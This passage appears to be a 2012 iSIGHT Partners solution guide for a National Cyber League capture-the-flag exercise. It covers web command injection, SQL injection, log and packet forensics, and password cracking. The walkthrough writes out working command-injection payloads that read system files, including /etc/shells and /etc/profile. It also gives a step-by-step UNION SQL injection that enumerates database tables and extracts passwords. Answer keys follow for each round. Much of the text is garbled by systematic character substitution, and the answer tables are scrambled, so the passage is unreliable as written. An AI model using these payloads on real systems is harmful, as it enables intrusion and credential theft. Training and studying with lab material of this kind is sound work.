Knowing the pievious tool input hau some limiteu valiuation, anu that this tool is anticipating a uomain name, the playei woulu tiy something along the lines of the following:
google.com; cat /etc/motd
Bowevei this will not woik, anu will pioviue a new eiioi.
Error: Must End In Valid TLD (.com, .net, .org, .gov)
The eiioi is cleai in the fact that the input must enu with a TLB (anu specifically one mentioneu in the eiioi message). Luckily the B%? utility giacefully ignoies nonexistent files. So simply auuing a "B/@K oi one of the othei alloweu TLBs, to the enu of the commanu (sepaiateu by a space fiom the path to the message of the uay) woulu woik.
google.com; cat /etc/motd .com
3rd Flag Is: NCL-AEFW-1680
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 29 4. I|ag Iour
The fouith flag iequiies the M*?BM=1*$$= file to be obtaineu via the Whois tool foim. A quick fiist attempt woulu likely iesult in an eiioi.
; cat /etc/shells
Command Injection Found - Denied
Inueeu this tool foim is uoing input valiuation anu is specifically blocking oui commanu injection. Tiial anu eiioi on the playeis' pait will likely yielu the fact that it is the semi- colon that is aleiting the web application to the commanu injection attempt. The uouble ampeisanu will also cause the web application to block the attempt. 0nly the pipe methou will woik.
| cat /etc/shells
The above will get the paiticipant aiounu the commanu injection check, but it stills iesults in an eiioi.
Error: Must End In Valid TLD (.com, .net, .org, .gov) Or be a valid IP
Combining the pieviously leaineu technique the playei can now easily obtain this fouith flag.
| cat /etc/shells 8.8.8.8
4th Flag Is: NCL-PUIQ-2347 S. I|ag I|ve
The fifth anu final flag foi this challenge is a configuiation seaich foim. 0nlike the othei tools, this one simply lists files that match the enteieu text pioviueu by the usei.
Testing uiffeient seaich patteins will ieveal that the foim is piefoiming a "L6)D" within the M*?B uiiectoiy. This flag will iequiie some unueistanuing of how the finu commanu woiks, specifically because the input fiom the useis is being placeu into the miuule of the finu commanu, so simply enuing the pievious commanu anu staiting a new one will not be possible.
Luckily L6)D has a built in execute option, which allows the output of the commanu to be passeu to a new commanu foi Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved Su execution. In this case the playei neeus to ietuin the M*?BMN2/L6$* file.
The following injection will finu a file (M*?BM@/?D) anu pass it to be executeu by the pioviueu commanu (B%? M*?BMN2/L6$*), iesulting in the iequiieu file being B%?XD anu the flag being ietuineu.
motd" -exec cat /etc/profile {} \;"
5th Flag Is: NCL-KDGD-0373 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S1 n. 1arget S|x - SL In[ect|on
The sixth taiget pioviues the playei with nothing moie than a login, asking foi a 0seiname anu Passwoiu.
0pon testing, the playei shoulu quickly leain that the Login is vulneiable to SQL Injection, a common authentication pioblem foi uatabase backeu web applications.
A simple SQL injection (enteieu in both the 0seiname anu Passwoiu fielu) will iesult in the playei being loggeu in as the aumin.
% or %%=%%
Congrats admin. You are authenticated.
Theie aie howevei two (2) flags foi this challenge. The playei neeus to obtain the passwoiu foi the 'Y=@6?1X account anu the item name foi the item with an IB of 6.
Foitunately the web application will pioviue the SQL that was executeu if you aie successfully authenticateu (oi, specifically, if the queiy succeeus).
Select * from tblUsers where UserName='' or ''='' and password='' or ''=''
Now that the playei has confiimeu theii ability to inject content into the SQL queiy, theii next task is to obtain the passwoiu foi Y=@6?1. The above queiy ieveals a few ielevant pieces of infoimation: the usei table name (?Z$[=*2=) anu two fielus fiom the usei table ([=*2I%@* anu N%==./2D).
The paiticipant shoulu note that the inteiface welcomes the usei by some type of name (possibly the [=*2I%@*) upon successful login. It is possible with this output to manipulate the queiy to ietuin the neeueu infoimation.
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S2 All futuie login attempts with this web application shoulu manipulate only the passwoiu fielu, leaving the useiname blank (oi with a tiue iesulting conuition like pieviously useu).
A [IU(I is a special SQL queiy connectoi that matches the output of one queiy with that of anothei, combining them into one laige output. The injection neeus to be a 0NI0N that ietuins the passwoiu fielu fiom the usei table, but also limits the iesults to a single iow, specifically the iow with the ielevant passwoiu in it. Eithei limiting the fiist queiy can uo this oi using conuitions to iemove ietuineu iows one-by-one. Foi obvious ieasons limiting the fiist queiy is a much quickei methou in this case but the conuition methou is useful when attempting to enumeiate the entiie table's contents.
The following injection shoulu ietuin the passwoiu foi 'jsmith':
' OR ''='' LIMIT 0 UNION SELECT Password FROM tblUsers WHERE UserName = 'jsmith' ORDER BY 'UserName
The above injection will howevei fail. The ieason the queiy fails is simple: the numbei of columns foi a [IU(I must match (same numbei in fiist anu seconu queiy). The playei shoulu now expeiiment with uiffeient numbeis of columns in the seconu queiy, until it succeeus. The contestant will soon come to leain that the usei table has foui columns anu thus the seconu queiy being injecteu must also ietuin foui columns.
' OR ''='' LIMIT 0 UNION SELECT Password, Password, Password, Password, Password FROM tblUsers WHERE UserName = 'jsmith' ORDER BY 'UserName
Which pioviues us the flag in the welcome message output.
Congrats NCL-DGSO-4432. You are authenticated.
Baseu on flag foimatting, anu the obvious intention of oui injection, the flag is cleaily iuentifiable in the welcome message. Now the paiticipant will move on to the item with an IB of 6. Common sense woulu inuicate that the items aie not stoieu in the usei table; of couise this is veiifiable by enumeiating the entiie table with the technique uetaileu pieviously.
Thus fai theie has been no inuication of the name of the seconu table, so that must be queiieu befoie we can obtain the piopei item infoimation. Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved SS NySQL happens to have a useful table, UI#(\V>-U(I"FA<HV>K which contains ielevant infoimation like the names of tables anu columns, etc. This schema can be queiieu, like any othei table, to ietuin the infoimation the playei is aftei. The following injection will ietuin the fiist table in the uatabase:
' OR ''='' LIMIT 0 UNION SELECT table_name, table_name, table_name, table_name, table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_schema != 'performance_schema' ORDER BY 'UserName
The queiy that is built as a iesult of this injection, will fiist queiy anu then ietuin zeio iesults fiom the usei table, anu then union with the seconu queiy, which is iequesting a table name fiom the infoimation schema, iemoving known uefaults fiom the output.
Congrats tblInventory. You are authenticated.
It just so happens that the fiist table is nameu "?Z$)7*)?/2T." Fuithei queiies woulu confiim that this is the only othei table in the uatabase. Next the playei will neeu to leain the columns within the inventoiy table. Again the UI#(\V>-U(I"FA<HV> can be queiieu foi this infoimation.
The above injection pioviues us with one ielevant column, 6?*@. This is likely the column playei neeus to ietuin foi the flag value. But fiist the contestant must leain the name of the item iuentification numbei column. 0tilizing the pievious queiy with an auueu conuition to ignoie the "6?*@" column shoulu pioviue the next column in the inventoiy table.
Congrats itemNum. You are authenticated.
Now the playei has the iequiieu infoimation to ciaft the final queiy foi the last flag of taiget six, anu iounu one.
' OR ''='' LIMIT 0 UNION SELECT item, item, item, item, item FROM tblInventory WHERE itemNum = 6 ORDER BY 'UserName
Congrats NCL-GSHI-9834. You are authenticated. Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S4
III. kound 1wo - Log Ana|ys|s
In the seconu iounu paiticipants weie to iecovei fifty (Su) flags, founu within six (6) uiffeient files (five log files, anu one netwoik uata captuie). The files weie as follows: Winuows Secuiity Log, Coiiupteu Winuows Secuiity Log, Linux Authentication Log, Coiiupteu Linux Authentication Log, Apache Logs, Netwoik Bata Captuie.
A. Scenar|o
uieat }ob Reciuit! You uemonstiateu some goou skills uuiing that fiist FCA Captuie-the-Flag Exeicise!
Now, the time has come foi some ieal cybei-sleuthing. It seems we have oui fiist big case foi you.
0ne of oui client agencies was compiomiseu. Luckily foi us, they weie able to get some logs, but sauly the attackei coveieu some of theii tiacks as well. The goou news is the client was able to iecovei some of the uelete logs. The bau news is that the uata is cleaily coiiupteu, anu they weien't able to figuie out how to get them open again.
Beie is what we know. An uniuentifieu attackei accesseu a Winuows seivei; the next uay a Linux seivei was compiomiseu; anu finally theii web site was uefaceu. We've been given six files: a Winuows Secuiity Log, a Coiiupteu Winuows Secuiity Log, a Linux Authentication Log, a Coiiupteu Linux Authentication Log, the Apache Log Files, anu a Netwoik Bata Captuie fiom the compiomiseu Web seivei.
0sing these files, please tiy to uncovei as much infoimation as you can about the attacks. We have a questionnaiie to help guiue you thiough anu help us finu the ielevant infoimation.
uoou luck ieciuit! Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved SS 8. I|ags Name Server
Value Which user changed the system name? 127.0.3.1 (Windows Security Log) 100 Which user had a failed brute force attack run against it? 127.0.3.1 (Windows Security Log) 200 Which user account was succesfully brute forced? 127.0.3.1 (Windows Security Log) 200 Which IP address launched the brute force? 127.0.3.1 (Windows Security Log) 200 After obtaining valid credentials, the attacker logs into the system via what protocol? 127.0.3.1 (Windows Security Log) 300 The attacker adds which user account to the system? 127.0.3.1 (Windows Security Log) 300 Which group, other than Administrators was the attakers account added? 127.0.3.1 (Windows Security Log) 300 Which new group did the attacker create? 127.0.3.1 (Windows Security Log) 300 At what time did the attacker finally logout of the system? 127.0.3.1 (Windows Security Log) 400 Which user attempted to add themselves to the Administrator group? 127.0.3.1 (Windows Security Log) 500 Which account did the attacker login with? 127.0.3.2 (Corrupt Windows Security Log) 600 What time did the attacker login? 127.0.3.2 (Corrupt Windows Security Log) 600 What protocol did the attacker use to login? 127.0.3.2 (Corrupt Windows Security Log) 600 What time was the last action logged by our attacker? 127.0.3.2 (Corrupt Windows Security Log) 700 The attacker transferred a file to the system via which protocol? 127.0.3.2 (Corrupt Windows Security Log) 700 During login the attackers file is automatically run, what is the name of the file? 127.0.3.2 (Corrupt Windows Security Log) 700 After the attacker connects back via their trojan they gain SYSTEM privledges, what is the "New Process ID" for the process in which they 127.0.3.2 (Corrupt Windows Security Log) 800 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S6 Name Server
Value obtain SYSTEM privledges? Which binary was run with "New Process ID" of 2185560096? 127.0.3.2 (Corrupt Windows Security Log) 900 A file named svchost.exe was stored within which directory under Joe Johnson's TEMP directory? 127.0.3.2 (Corrupt Windows Security Log) 1000 Which other file was created in Joe Johnson's TEMP directory? 127.0.3.2 (Corrupt Windows Security Log) 1000 Which user installed and configured SSH access to the system? 127.0.3.3 (Linux Authentication Log) 100 Which user had a failed brute force attack against them? 127.0.3.3 (Linux Authentication Log) 200 Which user account was successfully brute forced? 127.0.3.3 (Linux Authentication Log) 200 Which IP address launched the brute force attacks? 127.0.3.3 (Linux Authentication Log) 200 Which IP address did the attack than use to connect to the system? 127.0.3.3 (Linux Authentication Log) 300 Which protocol did the attack use to login to the system? 127.0.3.3 (Linux Authentication Log) 300 What was the first file the attacker read once obtaining access to the system? 127.0.3.3 (Linux Authentication Log) 300 Which user account did the attacker add to the system? 127.0.3.3 (Linux Authentication Log) 300 At what time did the Authentication Token get altered for the user abrown? 127.0.3.3 (Linux Authentication Log) 400 Which IP address did the attacker telnet into from the compermised host? 127.0.3.3 (Linux Authentication Log) 500 Which user account does the attack login with? 127.0.3.4 (Corrupt Linux Authentication Log) 600 What IP address is the attacker coming from? 127.0.3.4 (Corrupt Linux Authentication Log) 600 Which protocol did the attacker use to login? 127.0.3.4 (Corrupt Linux Authentication Log) 600 To which file did the attacker edit to provide their account root level permissions? 127.0.3.4 (Corrupt Linux Authentication Log) 700 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S7 Name Server
Value The attacker transfers a trojan to the system using which protocol? 127.0.3.4 (Corrupt Linux Authentication Log) 700 The attacker modifies which file to ensure the trojan is executed on system startup? 127.0.3.4 (Corrupt Linux Authentication Log) 700 Which permission does the attacker give the trojan to ensure it has elevated privledges regarless of who runs it? 127.0.3.4 (Corrupt Linux Authentication Log) 800 What type of attack did the user launch at 09:47:27? 127.0.3.4 (Corrupt Linux Authentication Log) 900 The attacker changed the default permission for all future files and directories to what? (use long symbloic format) 127.0.3.4 (Corrupt Linux Authentication Log) 1000 The global shell profile was changed, what command was added to this profile? 127.0.3.4 (Corrupt Linux Authentication Log) 1000 Which IP address was used to launch a Nikto scan? 127.0.3.5 (Apache Logs)
100 Which IP address was used to launch a Nessus scan? 127.0.3.5 (Apache Logs)
100 What time did the NMAP scan start? 127.0.3.5 (Apache Logs)
200 Which browser was the attacker using when visiting the website? 127.0.3.5 (Apache Logs)
300 Which IP address did the attacker use when manually testing the web service? 127.0.3.5 (Apache Logs)
500 What HTTP Request Method is used to deface the website? 127.0.0.6 (Network Data Capture) 200 What is the sequence number for the packet which defaced the website? 127.0.0.6 (Network Data Capture) 300 What is the sequence number for the first packet that contains invalid TCP flag options? 127.0.0.6 (Network Data Capture) 1000 Which Snort Community Signature (ID) should fire on the web defacement? 127.0.0.6 (Network Data Capture) 1500 What flag was present on the defaced website? 127.0.0.6 (Network Data Capture) 5000
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S8 C. W|ndows Secur|ty Log
The pioviueu Winuow Secuiity Log is in the Event viewei Log foimat, which shoulu be openeu with the Winuows Event viewei. Aftei opening the log file, the flags aie self-explanatoiy; each is simply founu within the log. 0ne shoitcut that might expeuite the seaich foi the flag answeis is to save the log in the Comma Sepaiateu value (CSv) foimat, anu then use a text baseu euitoi to peifoim the iequiieu seaiches.
I|ag uest|ons I|ag Answers Whlch user changed Lhe sysLem name? [[ohnson Whlch user had a falled bruLe force aLLack run agalnsL lL? Landerson Whlch user accounL was successfully bruLe forced? [smlLh Whlch l address launched Lhe bruLe force? 192.168.243.131 AfLer obLalnlng valld credenLlals, Lhe aLLacker logs lnLo Lhe sysLem vla whaL proLocol? LelneL 1he aLLacker adds whlch user accounL Lo Lhe sysLem? nsanders Whlch group, oLher Lhan AdmlnlsLraLors, was Lhe aLLacker accounL added? 8ackup CperaLors Whlch new group dld Lhe aLLacker creaLe? SupporL AL whaL Llme dld Lhe aLLacker flnally logouL of Lhe sysLem? 12:47:13M Whlch user aLLempLed Lo add Lhemselves Lo Lhe AdmlnlsLraLor group? emlller
D. Corrupt W|ndows Secur|ty Log
Foi this challenge the playei was pioviueu a Coiiupteu Winuows Secuiity Log. This log was also in the Winuows Event viewei foimat, howevei it woulu fail to open in the Winuows Event viewei.
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S9 Lucky foi the playei, they have the pieviously pioviueu non-coiiupt log to compaie against. 0pening the coiiupteu log file in a Bex Euitoi shoulu ieveal some useful infoimation.
0ne thing is cleai, coiiupt oi not, the file still contains peitinent log infoimation. File types aie veiy often ueteimineu by the veiy beginning of the file, this is a common place foi pioblems to begin. Compaiing the beginning of the coiiupteu file.
To the known valiu file will ieveal the issue.
The playei now neeus to simply piepenu the file with the piopei hexauecimal value.
30000000
At this point the playei can loau the log in Event viewei anu ietiieve the flags. Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 4u
I|ag uest|ons I|ag Answers Whlch accounL dld Lhe aLLacker logln wlLh? nsanders WhaL Llme dld Lhe aLLacker logln? 08:43:03AM WhaL proLocol dld Lhe aLLacker use Lo logln? LelneL WhaL Llme was Lhe lasL acLlon logged by our aLLacker? 10:06:38AM 1he aLLacker Lransferred a flle Lo Lhe sysLem vla whlch proLocol? fLp uurlng logln Lhe aLLackers flle ls auLomaLlcally run, whaL ls Lhe name of Lhe flle? a.exe AfLer Lhe aLLacker connecLs back vla Lhelr Lro[an Lhey galn S?S1LM prlvledges, whaL ls Lhe "new rocess lu" for Lhe process ln whlch Lhey obLaln S?S1LM prlvledges? 2184204320 Whlch blnary was run wlLh "new rocess lu" of 2183360096? cscrlpL.exe A flle named svchosL.exe was sLored wlLhln whlch dlrecLory under !oe !ohnson's 1LM dlrecLory? rad418u4.Lmp Whlch oLher flle was creaLed ln !oe !ohnson's 1LM dlrecLory? CvZrvu.exe
L. L|nux Authent|cat|on Log
Foi this challenge the paiticipant is given a Linux Authentication Log, which contains a laige numbei of log entiies, on which flag questions aie baseu. }ust like the non-coiiupteu Winuows log; this section of flags is self-explanatoiy. The contestant simply neeus to ieau the logs anu finu the ielevant entiies coiiesponuing to the flags. It shoulu be noteu that the filename enueu with a ""!" which shoulu have been an inuicatoi to the log files foimat. Linux systems often iotate logs on a time oi size basis, once a log ieaches the pieuefineu thiesholu, it is compiesseu anu ienameu to piepenu a numbei at the enu (1 being the most iecently iotateu log, up thiough whatevei maximum is configuieu, being the last). So in this case the playei woulu inueeu neeu to uncompiess the log file befoie pioceeuing.
gzip $d $S ".1! NCL-R2-LAUTH.1
less NCL-R2-LAUTH Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 41
I|ag uest|ons I|ag Answers Whlch user lnsLalled and conflgured SSP access Lo Lhe sysLem? abrown Whlch user had a falled bruLe force aLLack agalnsL Lhem? mdavls Whlch user accounL was successfully bruLe forced? Landerson Whlch l address launched Lhe bruLe force aLLacks? 192.168.243.1 33 Whlch l address dld Lhe aLLack Lhan use Lo connecL Lo Lhe sysLem? 192.168.243.1 91 Whlch proLocol dld Lhe aLLack use Lo logln Lo Lhe sysLem? ssh WhaL was Lhe flrsL flle Lhe aLLacker read once obLalnlng access Lo Lhe sysLem? /eLc/shadow Whlch user accounL dld Lhe aLLacker add Lo Lhe sysLem? [bowers AL whaL Llme dld Lhe AuLhenLlcaLlon 1oken geL alLered for Lhe user abrown? 13:04:13 Whlch l address dld Lhe aLLacker LelneL lnLo from Lhe compermlsed hosL? 192.168.243.2 34
I. Corrupt L|nux Authent|cat|on Log
The playei is pioviueu with a Linux Authentication log that is coiiupteu. The file is compiesseu, uue to log iotation, anu a poition of the compiesseu file was tiuncateu, iesulting in its coiiuption. 0nce openeu, the paiticipant can easily answei the ielevant flag questions, but simply using &J6N won't uo.
gzip -d -S ".1" blah.1
gzip: blah.1: unexpected end of file
But uZIP is a iesilient compiession, anu theie aie a vast amount of Linux tools capable of helping us iecoveiy the uata fiom within this log file. In fact even &J6N itself is capable of ieauing the non-tiuncateu uata, simply by piping it the file contents. Alteinatively the contestant can use JB%? oi some othei uZIP compatible tool.
zcat NCL-R2-CLAUTH.log.1
At this point the playei can now ieview the log entiies anu finu the iequiieu flag answeis. Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 42
I|ag uest|ons I|ag Answers Whlch user accounL does Lhe aLLack logln wlLh? [bowers WhaL l address ls Lhe aLLacker comlng from? 192.168.243.131 Whlch proLocol dld Lhe aLLacker use Lo logln? ssh 1o whlch flle dld Lhe aLLacker edlL Lo provlde Lhelr accounL rooL level permlsslons? /eLc/group 1he aLLacker Lransfers a Lro[an Lo Lhe sysLem uslng whlch proLocol? hLLp 1he aLLacker modlfles whlch flle Lo ensure Lhe Lro[an ls execuLed on sysLem sLarLup? /eLc/rc.local Whlch permlsslon does Lhe aLLacker glve Lhe Lro[an Lo ensure lL has elevaLed prlvledges regarless of who runs lL? seLuld WhaL Lype of aLLack dld Lhe user launch aL 09:47:27? fork bomb 1he aLLacker changed Lhe defaulL permlsslon for all fuLure flles and dlrecLorles Lo whaL? (use long symblolc formaL) -rw-rw-rw- 1he global shell proflle was changed, whaL command was added Lo Lhls proflle? exlL
G. Apache Log
This puzzle pioviues the contestant with an aichive containing Apache Access anu Eiioi logs. With these files, the playei simply neeus to locate the ielevant entiies anu answei the flag questions.
I|ag uest|ons I|ag Answers Whlch l address was used Lo launch a nlkLo scan? 192.168.243.13 Whlch l address was used Lo launch a nessus scan? 192.168.243.113 WhaL Llme dld Lhe nMA scan sLarL? 11:43:03 Whlch browser was Lhe aLLacker uslng when vlslLlng Lhe webslLe? konqueror Whlch l address dld Lhe aLLacker use when manually LesLlng Lhe web servlce? 192.168.243.113
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 4S n. Network Data Capture
In this puzzle the playei is pioviueu a collection of captuieu packets. The packets aie stoieu in the inuustiy stanuaiu $6ZNB%N foimat. As such the contestant shoulu utilize a $6ZNB%N compatible netwoik tiaffic analyzei, such as ]62*=1%2C oi ?BND4@N.
The fiist thiee flags aie obtainable by simply analyzing the tiaffic.
tcpdump $nnr NCL-R2-ND.pcap | less
tcpdump $Xnnr NCL-R2-ND.pcap | less
tcpdump $Annr NCL-R2-ND.pcap | less
The fiist flag question asks which BTTP Request Nethou is useu to ueface the website. Knowing the funuamentals of BTTP shoulu quickly aleit the playei to the usage of the "E[-" methou in the tiaffic.
15:21:47.113411 IP 192.168.245.131.58246 > 192.168.245.141.80: Flags [P.], seq 1:235, ack 1, win 913, options [nop,nop,TS val 53158427 ecr 6560569], length 234 E...R.@.@.z............P..p.t.,t....n...... .+"..d.9PUT /admin/update.php HTTP/1.1 Host: 192.168.245.141 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: text/plain Content-Length: 67
Fuithei ieview claiifies that inueeu the "E[-" commanu was useu to ueface the website.
The next two flag questions simply iequiie fuithei ieview anu seaiching of the netwoik tiaffic. The last flag question howevei is quite a laige amount of points. Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 44 The question piesenteu is what the image (now being uisplayeu on the uefaceu website) says. This iequiies the playei to peifoim uata caiving on the netwoik tiaffic to extiact the image (which is cleaily sent in the tiaffic).
The ?BNG?2%B? utility uoes a gieat job of extiacting files fiom a netwoik stieam oi $6ZNB%N file.
tcpxtract -f NCL-R2-ND.pcap
Found file of type "gif" in session [192.168.245.141:20480 -> 192.168.245.131:21376], exporting to 00000000.gif Found file of type "gif" in session [192.168.245.141:20480 -> 192.168.245.131:21376], exporting to 00000001.gif Found file of type "gif" in session [192.168.245.141:20480 -> 192.168.245.131:21632], exporting to 00000002.gif Found file of type "gif" in session [192.168.245.141:20480 -> 192.168.245.131:28032], exporting to 00000003.gif Found file of type "gif" in session [192.168.245.141:20480 -> 192.168.245.131:28544], exporting to 00000004.gif Found file of type "jpg" in session [192.168.245.141:20480 -> 192.168.245.131:28288], exporting to 00000005.jpg Found file of type "png" in session [192.168.245.131:20480 -> 192.168.245.141:42439], exporting to 00000006.png Found file of type "png" in session [192.168.245.141:20480 -> 192.168.245.131:36992], exporting to 00000007.png
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 4S IV. kound 1hree - Cryptography
The thiiu iounu of the NCL competition incluueu a numbei of ciyptogiaphy ielateu challenges, ianging fiom simple ciyptogiaphy systems to complex steganogiaphy puzzles.
A. Scenar|o
Congiatulations on yet anothei job well uone! Youi log analysis iepoits helpeu us piece togethei what ieally happeneu uuiing the attack on oui client's systems. In fact, you've also helpeu us iuentify some weaknesses in oui client's cybeisecuiity postuie.
Baseu on the infoimation you uncoveieu uuiing the log analysis, we've come to unueistanu that passwoiu complexity was seveiely lacking at oui client's oiganization. Theiefoie, we have askeu the client to senu ovei theii passwoiu files.
Baseu on youi log analysis woik, the client iuentifieu some auuitional clues that the 'not so caieful' attackei left behinu. 0nfoitunately, most of the uata the attackei left behinu is enciypteu oi encoueu in some fashion.
Youi mission is as follows: Bo some passwoiu secuiity analysis anu testing on the client's passwoiu files uo thiough the aitifacts fiom the client's attack anu see what you can uncovei
We neeu to secuie this system, so this uoesn't happen again.
Thanks again foi youi ueuicateu seivice anu a job well uone! Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 46 8. I|ags
Name Server
Value What hashing algorithm is in use for Emily Miller's account? 127.0.0.1 (Linux Passwords)
100 What hashing algorithm Is in use for Tom Anderson's account? 127.0.0.1 (Linux Passwords)
100 What hashing algorithm is in use for Amanda Williams's account? 127.0.0.1 (Linux Passwords)
100 What hashing algorithm is in use for Michael Davis's account? 127.0.0.1 (Linux Passwords)
100 What hashing algorithm is in use for Daniel Jameson's account? 127.0.0.1 (Linux Passwords)
100 What is the plaintext password for Emily Miller's account? 127.0.0.1 (Linux Passwords)
200 What is the plaintext password for Tom Anderson's account? 127.0.0.1 (Linux Passwords)
200 What is the plaintext password for Amanda Williams's account? 127.0.0.1 (Linux Passwords)
200 What is the plaintext password for Michael Davis's account? 127.0.0.1 (Linux Passwords)
200 What is the plaintext password for Daniel Jameson's account? 127.0.0.1 (Linux Passwords)
200 What is the plaintext password for Kim Jones's account? 127.0.0.1 (Linux Passwords)
300 What is the plaintext password for Brandon Davidson's account? 127.0.0.1 (Linux Passwords)
400 What is the plaintext password for Aaron Brown's account? 127.0.0.1 (Linux Passwords)
500 What is the plaintext password for John Smith's account? 127.0.0.1 (Linux Passwords)
1000 What is the plaintext password for attackers account (jbowers)? 127.0.0.1 (Linux Passwords)
2500 What is the plaintext password for the root account? 127.0.0.1 (Linux Passwords)
2500 What is the plaintext password for John Smith's account? 127.0.0.2 (Window Passwords)
100 What is the plaintext password for James Johnson's account? 127.0.0.2 (Window Passwords)
100 What is the plaintext password for Emily Miller's account? 127.0.0.2 (Window Passwords)
200 What is the plaintext password for Tom Anderson's account? 127.0.0.2 (Window Passwords)
200 What is the plaintext password for Amanda Williams's account? 127.0.0.2 (Window Passwords)
200 What is the plaintext password for Michael Davis's account? 127.0.0.2 (Window Passwords)
200 What is the plaintext password for Daniel Jameson's account? 127.0.0.2 (Window Passwords)
200 What is the plaintext password for Kim Jones's account? 127.0.0.2 (Window Passwords)
300 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 47 Name Server
Value What is the plaintext password for Brandon Davidson's account? 127.0.0.2 (Window Passwords)
400 What is the plaintext password for Aaron Brown's account? 127.0.0.2 (Window Passwords)
500 What is the plaintext password for attackers account (nsanders)? 127.0.0.2 (Window Passwords)
2500 What is the plaintext password for the Administrator's account? 127.0.0.2 (Window Passwords)
2500 What is the first Advanced Cryptography flag? 127.0.0.4 (Advanced Cryptography) 300 What is the second Advanced Cryptography flag? 127.0.0.4 (Advanced Cryptography) 300 What is the third Advanced Cryptography flag? 127.0.0.4 (Advanced Cryptography) 300 What is the flag for the first Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)
100 What is the passphrase for the key-pair? 127.0.0.4 (Advanced Cryptography) 5000 Using the previous key-pair, what is the fifth Advanced Cryptography flag? 127.0.0.4 (Advanced Cryptography) 5000 What is the flag for the second Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)
200 What is the flag for the third Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)
200 What is the flag for the fourth Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)
200 What is the flag for the fifth Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)
500 What is the flag for the sixth Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)
600 What is the flag for the seventh Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)
600 What is the flag for the eighth Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)
700 What is the flag for the ninth Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)
900 What is the flag for the tenth Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)
2000 What is the flag found in the first Steganography challenge? 127.0.0.5 (Steganography)
200 What is the flag found in the second Steganography challenge? 127.0.0.5 (Steganography)
200 What is the flag found in the third Steganography challenge? 127.0.0.5 (Steganography)
300 What is the flag found in the fourth Steganography challenge? 127.0.0.5 (Steganography)
300 What is the flag found in the fifth Steganography challenge? 127.0.0.5 (Steganography)
500 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 48 Name Server
Value What is the flag found in the sixth Steganography challenge? 127.0.0.5 (Steganography)
500 What is the flag found in the seventh Steganography challenge? 127.0.0.5 (Steganography)
5000
C. L|nux asswords
The playei was pioviueu with a complete Linux etcshauow file, containing the hasheu veisions of all usei passwoius. The contestant was then askeu to finu a seiies of flags, namely the ciyptogiaphy hashing algoiithm oi the passwoiu itself.
1. nash|ng A|gor|thms
The fiist five (S) flags ask simply foi the hashing algoiithm useu foi the paiticulai usei's passwoiu hash. This is easily obtainable fiom the beginning pait of the hash.
Linux hashes within the M*?BM=1%D/. file stait with a uollai sign followeu by a numeiical value iepiesenting the hashing algoiithm. With the single exception of unsalteu BES hashes which just pioviue the hash.
I|ag uest|ons I|ag Answers WhaL hashlng algorlLhm ls ln use for Lmlly Mlller's accounL? uLS WhaL hashlng algorlLhm ls ln use for 1om Anderson's accounL? md3 WhaL hashlng algorlLhm ls ln use for Amanda Wllllams's accounL? uLS WhaL hashlng algorlLhm ls ln use for Mlchael uavls's accounL? SPA236 WhaL hashlng algorlLhm ls ln use for uanlel !ameson's accounL? sha312
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 49 2. Cracked asswords
Simply enough, the iequiiement was to ciack eleven (11) Linux passwoius, anu submit the ciackeu plaintext passwoiu as the flag.
0f these eleven (11) passwoius, the fiist five (S) weie uictionaiy teims. The next two (2) weie uictionaiy teims beginning with a capital lettei anu appenueu with a numeiical uigit, a simple peimutation. The following thiee (S) aie a slightly moie complex peimutation, two uictionaiy teims sepaiateu by a numeiical uigit. The last two passwoius weie by fai the most uifficult, using the stanuaiu NCL foimat; these weie a total of thiiteen chaiacteis long, containeu two symbols, foui alphabetic chaiacteis anu foui numeiical uigits.
Regaiuless, the entiie passwoiu list was bieakable with simple tools such as ^/1) -1* \6NN*2.
Some clevei peimutation iules oi custom uictionaiy files woulu ceitainly make the last two (complex) passwoius much easiei to ciack. The playei knew the NCL foimat followeu a pieuictable pattein, the letteis "N", "C", anu "L" followeu by a single hyphen, then foui ianuom alphabetical chaiacteis, anothei hyphen, anu then foui ianuom numeiical chaiacteis. With this infoimation the ielative numbei of chaiacteis neeuing to be testeu goes uown to eight. Thus limiting the entiie maximum possible passwoius to only 466,976.
